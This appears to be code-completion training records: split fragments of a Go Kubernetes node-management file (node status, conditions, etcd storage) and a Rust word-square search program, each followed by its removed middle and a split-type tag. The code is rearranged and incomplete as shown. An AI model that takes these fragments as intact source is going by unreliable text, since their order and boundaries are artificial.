ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus | //worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
}
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
} | type NodeStatus struct { | random_line_split |
main.rs | //#![feature(exclusive_range_pattern)]
#![feature(nll)]
extern crate fnv;
extern crate spmc;
extern crate unicode_skeleton;
#[macro_use]
extern crate clap;
use std::default::Default;
use std::vec::Vec;
use std::io::{self, BufReader, BufWriter};
use std::io::prelude::*;
use std::fs::File;
use std::thread;
use fnv::FnvHashMap;
use unicode_skeleton::UnicodeSkeleton;
use clap::{Arg, App, SubCommand, ArgMatches};
macro_rules! make_encode_decode {
(
$( $num:expr => $char:expr; )+
) => {
fn encode(from:char) -> Option<u8> {
let res:u8 = match from {
$(
$char => $num,
)+
_ => return None,
};
return Some(res)
}
fn decode(code:u8) -> Option<char> {
let res:char = match code {
$(
$num => $char,
)+
255 => '#',
32 => '$',
_ => return None,
};
return Some(res)
}
}
}
make_encode_decode!{
0 => 'a';
1 => 'e';
2 => 'i';
3 => 'o';
4 => 'r';
5 => 'n';
6 => 'l';
7 => 's';
8 => 't';
9 => 'u';
10 => 'p';
11 => 'c';
12 => 'd';
13 => 'k';
14 => 'y';
15 => 'g';
16 => 'h';
17 => 'b';
18 => 'v';
19 => 'f';
20 => 'w';
21 => 'z';
22 => 'j';
23 => 'x';
24 => '\'';
25 => '-';
26 => 'è';
27 => 'ê';
28 => 'ñ';
29 => 'é';
30 => 'm';
31 => 'q';
}
#[derive(Debug,Clone,Copy,PartialEq,Eq)]
struct CharSet {
pub internal:u32
}
impl CharSet {
fn new(internal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
CharSet::new(0)
}
}
// NOTE: can only go up to 15. 16 would break everything
//const WORD_SQUARE_ORDER:usize = 6;
// const WORD_SQUARE_WIDTH:usize = 8;
// const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "width-2")]
const WORD_SQUARE_WIDTH:usize = 2;
#[cfg(feature = "width-3")]
const WORD_SQUARE_WIDTH:usize = 3;
#[cfg(feature = "width-4")]
const WORD_SQUARE_WIDTH:usize = 4;
#[cfg(feature = "width-5")]
const WORD_SQUARE_WIDTH:usize = 5;
#[cfg(feature = "width-6")]
const WORD_SQUARE_WIDTH:usize = 6;
#[cfg(feature = "width-7")]
const WORD_SQUARE_WIDTH:usize = 7;
#[cfg(feature = "width-8")]
const WORD_SQUARE_WIDTH:usize = 8;
#[cfg(feature = "width-9")]
const WORD_SQUARE_WIDTH:usize = 9;
#[cfg(feature = "width-10")]
const WORD_SQUARE_WIDTH:usize = 10;
#[cfg(feature = "width-11")]
const WORD_SQUARE_WIDTH:usize = 11;
#[cfg(feature = "width-12")]
const WORD_SQUARE_WIDTH:usize = 12;
#[cfg(feature = "width-13")]
const WORD_SQUARE_WIDTH:usize = 13;
#[cfg(feature = "width-14")]
const WORD_SQUARE_WIDTH:usize = 14;
#[cfg(feature = "width-15")]
const WORD_SQUARE_WIDTH:usize = 15;
#[cfg(feature = "height-2")]
const WORD_SQUARE_HEIGHT:usize = 2;
#[cfg(feature = "height-3")]
const WORD_SQUARE_HEIGHT:usize = 3;
#[cfg(feature = "height-4")]
const WORD_SQUARE_HEIGHT:usize = 4;
#[cfg(feature = "height-5")]
const WORD_SQUARE_HEIGHT:usize = 5;
#[cfg(feature = "height-6")]
const WORD_SQUARE_HEIGHT:usize = 6;
#[cfg(feature = "height-7")]
const WORD_SQUARE_HEIGHT:usize = 7;
#[cfg(feature = "height-8")]
const WORD_SQUARE_HEIGHT:usize = 8;
#[cfg(feature = "height-9")]
const WORD_SQUARE_HEIGHT:usize = 9;
#[cfg(feature = "height-10")]
const WORD_SQUARE_HEIGHT:usize = 10;
#[cfg(feature = "height-11")]
const WORD_SQUARE_HEIGHT:usize = 11;
#[cfg(feature = "height-12")]
const WORD_SQUARE_HEIGHT:usize = 12;
#[cfg(feature = "height-13")]
const WORD_SQUARE_HEIGHT:usize = 13;
#[cfg(feature = "height-14")]
const WORD_SQUARE_HEIGHT:usize = 14;
#[cfg(feature = "height-15")]
const WORD_SQUARE_HEIGHT:usize = 15;
//const WORD_ORDER_U8:u8 = WORD_SQUARE_ORDER as u8;
const WORD_SQUARE_SIZE:usize = WORD_SQUARE_WIDTH * WORD_SQUARE_HEIGHT;
type WideWord = [u8; WORD_SQUARE_WIDTH];
type TallWord = [u8; WORD_SQUARE_HEIGHT];
type WordSquare = [u8; WORD_SQUARE_SIZE];
#[derive(Debug,Default)]
struct WordIndex {
inner_rows: FnvHashMap<WideWord,CharSet>,
#[cfg(not(feature = "square"))]
inner_cols: FnvHashMap<TallWord,CharSet>,
}
impl WordIndex {
fn rows(&self) -> &FnvHashMap<WideWord,CharSet> {
&self.inner_rows
}
fn cols(&self) -> &FnvHashMap<TallWord,CharSet> {
#[cfg(not(feature = "square"))]
return &self.inner_cols;
#[cfg(feature = "square")]
return self.rows();
}
fn rows_mut(&mut self) -> &mut FnvHashMap<WideWord,CharSet> {
&mut self.inner_rows
}
#[cfg(not(feature = "square"))]
fn cols_mut(&mut self) -> &mut FnvHashMap<TallWord,CharSet> {
&mut self.inner_cols
}
}
fn print_word_square(sq:WordSquare){
let mut first = true;
for i in 0..WORD_SQUARE_HEIGHT {
let mut chars = Vec::new();
for j in 0..WORD_SQUARE_WIDTH {
chars.push(decode(sq[i*WORD_SQUARE_WIDTH + j]).unwrap());
}
let word = chars.iter().collect::<String>();
if !first {
print!("-");
}
print!("{}", word);
first = false;
}
println!();
}
fn main() -> io::Result<()> {
| filter_word(word:&str) -> Option<String> {
let mut success = true;
let res = Some(word.chars().map(|c| {
match encode(c) {
Some(_) => c,
None => {
let chars:Vec<char> = c.to_string().skeleton_chars().collect();
if chars.len() != 1 {
success = false;
'a'
} else {
match encode(chars[0]) {
Some(_) => chars[0],
None => {success = false; 'a'},
}
}
},
}
}).collect::<String>());
if success {
return res
} else {
return None
}
}
fn wordlist_preprocess(args:&ArgMatches) -> io::Result<()> {
let in_file = File::open( args.value_of("input-filename" ).unwrap())?;
let out_file = File::create(args.value_of("output-filename").unwrap())?;
let wik_format = args.is_present("wiktionary-list-format");
let f = BufReader::new(in_file);
let mut fo = BufWriter::new(out_file);
let mut lines = f.lines();
if wik_format {
//Skip the first line
lines.next().unwrap()?;
}
for line_result in lines {
let line = line_result?;
let word;
if wik_format {
let mut split = line.split('\t');
split.next().unwrap(); // skip before tab
word = split.next().unwrap();
match split.next() {
Some(_) => panic!("Only one tab expected per line"),
None => (),
}
} else {
word = &line
}
match filter_word(word) {
Some(word) => writeln!(&mut fo, "{}", word)?,
None => (),
}
}
fo.flush()?;
return Ok(());
}
fn make_words_index(
f_in: impl BufRead,
ignore_unencodeable: bool,
) -> io::Result<(u32, u32, WordIndex)> {
let mut index = WordIndex::default();
let mut count_row_words = 0;
#[cfg(not(feature = "square"))]
let mut count_col_words = 0;
let lines = f_in.lines();
for line_result in lines {
let word = line_result?;
let chars:Vec<char> = word.chars().collect();
if chars.len() != WORD_SQUARE_WIDTH && chars.len() != WORD_SQUARE_HEIGHT { continue }
let mut codes = Vec::new();
let mut all_encoded = true;
for c in chars.clone() {
match encode(c) {
Some(code) => codes.push(code),
None => {
all_encoded = false;
continue
},
}
}
if !all_encoded {
if !ignore_unencodeable {
eprintln!("Skipping {:?}, not all could be encoded",chars);
}
continue
}
if codes.len() == WORD_SQUARE_WIDTH {
count_row_words += 1;
let words_index = index.rows_mut();
let mut word = WideWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_WIDTH {
let i = (WORD_SQUARE_WIDTH - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
#[cfg(not(feature = "square"))]
if codes.len() == WORD_SQUARE_HEIGHT {
count_col_words += 1;
let words_index = index.cols_mut();
let mut word = TallWord::default();
for (i, code) in codes.iter().enumerate() {
word[i] = *code;
}
for j in 0..WORD_SQUARE_HEIGHT {
let i = (WORD_SQUARE_HEIGHT - 1) - j;
// for i in WORD_SQUARE_ORDER..0 including 0, excluding WORD_SQUARE_ORDER
let code = word[i];
word[i] = 255u8;
if !words_index.contains_key(&word) {
//println!("Inserting {:?}", word);
words_index.insert(word, CharSet::default());
}
words_index.get_mut(&word).unwrap().add(code);
}
}
}
#[cfg(feature = "square")]
let count_col_words = count_row_words;
return Ok((count_row_words, count_col_words, index));
}
fn compute_command(args:&ArgMatches) -> io::Result<()> {
let loud = !args.is_present("quiet");
let ignore_empty_wordlist = args.is_present("ignore-empty-wordlist");
let ignore_unencodeable = args.is_present("ignore-unencodeable");
if loud {
eprintln!("Word square order is {}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT);
eprintln!("Start: creating index.");
}
let num_threads:u32 = args.value_of("threads").unwrap().parse().unwrap();
let plain_f = File::open(args.value_of("wordlist").unwrap())?;
let f = BufReader::new(plain_f);
let (count_row_words, count_col_words, index) = make_words_index(f, ignore_unencodeable)?;
if !ignore_empty_wordlist && (index.rows().is_empty() || index.cols().is_empty()) {
panic!("No words in wordlist!");
}
if loud {
eprintln!("Finished creating index, {} words x {} words.", count_row_words, count_col_words);
}
let (m2w_tx, m2w_rx) = spmc::channel::<(WordSquare,u8)>();
let (w2m_tx, w2m_rx) = std::sync::mpsc::sync_channel(16);
let mut worker_handles = Vec::new();
if loud {
eprintln!("Creating {} worker threads.", num_threads);
}
let index_arc = std::sync::Arc::new(index);
for _ in 0..num_threads {
let rxc = m2w_rx.clone();
let txc = w2m_tx.clone();
let my_index = std::sync::Arc::clone(&index_arc);
worker_handles.push(
thread::spawn( move || {
while let Ok(msg) = rxc.recv() {
compute(
&my_index,
msg.0,
msg.1,
WORD_SQUARE_SIZE as u8,
|a,b| txc.send((a,b)).unwrap()
);
}
})
);
}
drop(w2m_tx);
let printing_thread = thread::spawn(move || {
while let Ok(msg) = w2m_rx.recv() {
print_word_square(msg.0);
}
});
let code_array = [255u8; WORD_SQUARE_SIZE];
if loud {
eprintln!("Starting.");
}
compute(
index_arc.as_ref(),
code_array,
0u8,
WORD_SQUARE_WIDTH as u8,
|ca, idx| m2w_tx.send((ca,idx)).unwrap()
);
drop(m2w_tx);
//println!("Dropped");
for h in worker_handles {
h.join().unwrap();
//println!("Worker finished");
}
printing_thread.join().unwrap();
//println!("printing thread finished");
/*let mut char_counts:Vec<(char,u64)> = unused_chars.drain().collect();
char_counts.sort_unstable_by_key(|t| t.1);
for (k,v) in char_counts.iter() {
println!("Char {:?} had {} instances", k, v);
}*/
Ok(())
}
const DEBUG_MODE:bool = false;
fn compute<T:FnMut(WordSquare,u8)>(
words_index_arg:&WordIndex,
mut code_array:WordSquare,
start_idx:u8,
target_idx:u8,
mut on_result:T,
) {
let mut at_idx = start_idx;
let mut charset_array = [CharSet::new(std::u32::MAX); WORD_SQUARE_SIZE];
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
// wrap to go from 0 to 255
let end_idx = start_idx.wrapping_sub(1);
while at_idx != end_idx {
// wrap to go from 255 (initial) to 0
if DEBUG_MODE {
println!();
println!(
"idx {} before wrapping add is {}",
at_idx,
code_array[at_idx as usize]
);
}
code_array[at_idx as usize] = code_array[at_idx as usize].wrapping_add(1);
if DEBUG_MODE {
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
for row in 0..WORD_SQUARE_HEIGHT {
for col in 0..WORD_SQUARE_WIDTH {
print!("{}, ", decode(code_array[row*WORD_SQUARE_WIDTH + col]).unwrap());
}
println!();
}
println!("row_idx {}, col_idx {}", row_idx, col_idx);
}
let cur_code = code_array[at_idx as usize];
if DEBUG_MODE { println!("cur_code {}", cur_code); }
let cur_charset = charset_array[at_idx as usize];
if cur_code == 32 {
code_array[at_idx as usize] = 255u8;
at_idx = at_idx.wrapping_sub(1)
} else if cur_charset.has(cur_code) {
at_idx += 1;
if at_idx == target_idx {
//print_word_square(code_array);
(&mut on_result)(code_array, at_idx);
at_idx -= 1;
} else {
code_array[at_idx as usize] = 255;
let row_idx = at_idx / (WORD_SQUARE_WIDTH as u8);
let col_idx = at_idx % (WORD_SQUARE_WIDTH as u8);
let row_start = row_idx*(WORD_SQUARE_WIDTH as u8);
let mut row_word = [255u8; WORD_SQUARE_WIDTH];
for i in 0..col_idx {
row_word[i as usize] = code_array[ (row_start+i) as usize ];
}
//println!("row_word {:?}", row_word);
let row_wordset = words_index_arg.rows()[&row_word];
let mut col_word = [255u8; WORD_SQUARE_HEIGHT];
for i in 0..row_idx {
col_word[i as usize] = code_array[ (col_idx + i*(WORD_SQUARE_WIDTH as u8)) as usize ];
}
//println!("col_word {:?}", row_word);
let col_wordset = words_index_arg.cols()[&col_word];
charset_array[at_idx as usize] = col_wordset.and(&row_wordset);
}
}
}
}
| let matches = App::new(format!("Rust Word Rectangle Finder o{}x{}", WORD_SQUARE_WIDTH, WORD_SQUARE_HEIGHT))
.version(crate_version!())
.author(crate_authors!())
.about(crate_description!())
.setting(clap::AppSettings::SubcommandRequired)
.subcommand(SubCommand::with_name("compute")
.about("Does the actual computation.")
.arg(Arg::with_name("threads")
.default_value("4")
.takes_value(true)
.validator(|arg| {
match arg.parse::<u32>() {
Ok(_) => Ok(()),
Err(e) => Err(String::from(format!("Must provide a valid integer. {:?}", e))),
}
})
.help("Number of threads to use.")
.long("threads")
.short("t")
)
.arg(Arg::with_name("wordlist")
.required(true)
.help("the wordlist file path, a plain-text UTF-8 file with each word separated by a newline")
)
.arg(Arg::with_name("ignore-empty-wordlist")
.long("ignore-empty-wordlist")
.help("Don't complain if there are no words of the necessary length in the given wordlist")
)
.arg(Arg::with_name("ignore-unencodeable")
.long("ignore-unencodeable")
.help("Don't show a warning when a word is dropped because it contains unencodeable characters.")
)
.arg(Arg::with_name("quiet")
.long("quiet")
.short("q")
.help("Don't show any status messages; STDERR will be empty if no errors occured.")
)
)
.subcommand(SubCommand::with_name("wordlist-preprocess")
.about("Takes in a wordlist (of various formats) and converts characters to a consistent set, for example 'а' (U+0430 CYRILLIC SMALL LETTER A) becomes 'a' (U+0061 LATIN SMALL LETTER A). Any words that would be ignored by the compute function are also filtered out.")
.arg(Arg::with_name("wiktionary-list-format")
.long("wiktionary-format")
.short("w")
.long_help("Input wordlist is in wiktionary \"all-titles\" format.")
.group("format")
)
.arg(Arg::with_name("plain-list-format")
.long("plain-format")
.short("p")
.long_help("Input wordlist is a plaintext UTF-8 newline-separated list of words")
.group("format")
)
.arg(Arg::with_name("input-filename")
.required(true)
.help("The path to the wordlist to read from, or \"-\" for stdin")
)
.arg(Arg::with_name("output-filename")
.required(true)
.help("The path to the wordlist to write to, or \"-\" for stdout")
)
).get_matches();
//println!("{:?}", matches.is_present("wordlist-preprocess"));
return match matches.subcommand() {
("compute", Some(m)) => compute_command(m),
("wordlist-preprocess", Some(m)) => wordlist_preprocess(m),
_ => panic!("This shouldn't happen"),
}
/*let mut args:Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Must have at least one argument (which sub-thing to run)");
return Ok(());
}
eprintln!("{:?}", args);
args.remove(0);
eprintln!("{:?}", args);
let name:&str = &(args.remove(0));
eprintln!("{:?}", args);
match name {
"wordlist-preprocess" => return wordlist_preprocess(args),
"compute" => return compute_command(args),
unfound_command => eprintln!("unrecognized command {}", unfound_command),
}*/
}
fn | identifier_body |
main.rs | //#![feature(exclusive_range_pattern)]
#![feature(nll)]
extern crate fnv;
extern crate spmc;
extern crate unicode_skeleton;
#[macro_use]
extern crate clap;
use std::default::Default;
use std::vec::Vec;
use std::io::{self, BufReader, BufWriter};
use std::io::prelude::*;
use std::fs::File;
use std::thread;
use fnv::FnvHashMap;
use unicode_skeleton::UnicodeSkeleton;
use clap::{Arg, App, SubCommand, ArgMatches};
macro_rules! make_encode_decode {
(
$( $num:expr => $char:expr; )+
) => {
fn encode(from:char) -> Option<u8> {
let res:u8 = match from {
$(
$char => $num,
)+
_ => return None,
};
return Some(res)
}
fn decode(code:u8) -> Option<char> {
let res:char = match code {
$(
$num => $char,
)+
255 => '#',
32 => '$',
_ => return None,
};
return Some(res)
}
}
}
make_encode_decode!{
0 => 'a';
1 => 'e';
2 => 'i';
3 => 'o';
4 => 'r';
5 => 'n';
6 => 'l';
7 => 's';
8 => 't';
9 => 'u';
10 => 'p';
11 => 'c';
12 => 'd';
13 => 'k';
14 => 'y';
15 => 'g';
16 => 'h';
17 => 'b';
18 => 'v';
19 => 'f';
20 => 'w';
21 => 'z';
22 => 'j';
23 => 'x';
24 => '\'';
25 => '-';
26 => 'è';
27 => 'ê';
28 => 'ñ';
29 => 'é';
30 => 'm';
31 => 'q';
}
#[derive(Debug,Clone,Copy,PartialEq,Eq)]
struct CharSet {
pub internal:u32
}
impl CharSet {
fn new(internal:u32) -> CharSet {
return CharSet{internal}
}
fn add(&mut self, val:u8) {
if val > 31 {panic!("Invalid val {}", val)}
self.internal |= 2u32.pow(val as u32)
}
fn and(&self, other:&Self) -> Self {
Self{ internal: self.internal & other.internal }
}
fn has(&self, val:u8) -> bool {
if val > 31 {
panic!("Invalid val {}", val)
} else {
return (self.internal & 2u32.pow(val as u32)) > 0
}
}
}
impl Default for CharSet {
fn default() -> Self {
